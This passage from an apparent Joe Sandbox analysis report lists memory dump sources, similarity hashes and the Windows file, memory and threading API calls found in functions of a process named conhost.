                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$ExceptionThrow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2803161813-0
                                                                                                                                                                                                                                          • Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                                                                                                                          • Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                                                          • Opcode ID: 1f9a55caba75cadcb91bceca6c230f2d475c92929f7224438b838ce811413bbf
                                                                                                                                                                                                                                          • Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9a55caba75cadcb91bceca6c230f2d475c92929f7224438b838ce811413bbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402815
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402839
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                                                          • Opcode ID: bed7f57db46ba43abd644648d02ff90f7b51b5d2083ba0ee63874616bb6d9ca7
                                                                                                                                                                                                                                          • Instruction ID: bcdea4c81718d913e52e4f2a3d02f3e10d2d0235028ef0e1c46e76d630642e7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bed7f57db46ba43abd644648d02ff90f7b51b5d2083ba0ee63874616bb6d9ca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF0903A0046419FC330AF2AC594843FBE8EB59714720CD7FE1D6D36A2C674A880C764
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0041232E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                                                                                                                          • Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004134D2
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                          • Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                                                                                                                          • Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,Shortcut,?,?,?,00000000,?,?), ref: 004052D3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 907d3067a0f0ca923029c38a05689f0d1b889070e2b590ff01ae01901b702738
                                                                                                                                                                                                                                          • Instruction ID: 0bb365396999fc963ec5f62f7917bd7f826dfa99e5f1c601d6dd50d1c2783384
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 907d3067a0f0ca923029c38a05689f0d1b889070e2b590ff01ae01901b702738
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A21BF7480051AAADF21AE94C844BFF3664EF12354F5401BFEC50712E1E63C8A92CEAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                                                                                                                          • Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041229A: CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3498533004-0
                                                                                                                                                                                                                                          • Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                                                                                                                          • Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                                          • Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                                                                                                                          • Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                                                                                          • Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                                                                                                                          • Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _beginthreadex
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3014514943-0
                                                                                                                                                                                                                                          • Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                                                                                                                          • Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                          • Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                                                                                                                          • Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                                                                                                                          • Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0040119C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                                                                          • Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                                                                                                                          • Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                                          • Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                                                                                                                          • Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileTime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1425588814-0
                                                                                                                                                                                                                                          • Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                                                                                                                          • Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00000000,?,?,?,?,?,?,00401AD3,?), ref: 004015F7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
